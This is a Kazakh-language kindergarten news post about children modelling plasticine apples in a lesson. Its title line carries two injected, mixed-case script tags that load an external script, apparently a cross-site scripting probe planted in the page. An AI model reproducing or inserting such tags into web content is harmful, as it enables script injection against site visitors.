Жемістердің ағзаға өте пайдалы екенін бәрі біледі, өйткені оларда көптеген дәрумендер бар!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.10.2021

   Жемістердің ағзаға өте пайдалы екенін бәрі біледі, өйткені оларда көптеген дәрумендер бар! Мектепалды даярлық «Болашақ» тобының балалары алманың  дәмін  татуды жақсы көреді. Сондықтан балалар «Бау-бақша»тақырыбында әйгілі «Пластилинография» техникасында  үлкен қуанышпен жұмыс жасады.Оқу қызметінің  басында балалар жемістерді қарап, түсін, пішінін сипаттады, жұмбақтарды шешіп, бақта қандай жемістер өсетінін атап өтті.Жалпы шешіммен балалар алмалар мүсіндеуге шешті. Оқу-қызметі барысында балалар модельдеудің әртүрлі әдістерін қолданды: илеу,пластилинді тегістеу және оны алдын-ала дайындалған алма  бейнесіне  біркелкі тарату, тегістеу тәсілдерімен орналастырды. Сонымен қатар біз түрлі-түсті ермексаздарды  араластырдық.  Әп-сәтте үстел үсті кез-келген талғамға,қызыл – сары және  жасыл дайын алмаларға толы болды. Оқу-қызметінің  соңында дайын жұмыстардан өте әдемі бақша  пайда болды.

Тәрбиеші: Кеслер О. Л.

Просмотров: 284


Пікір қосу



Деректерді қолтаңбаға қосу
Текст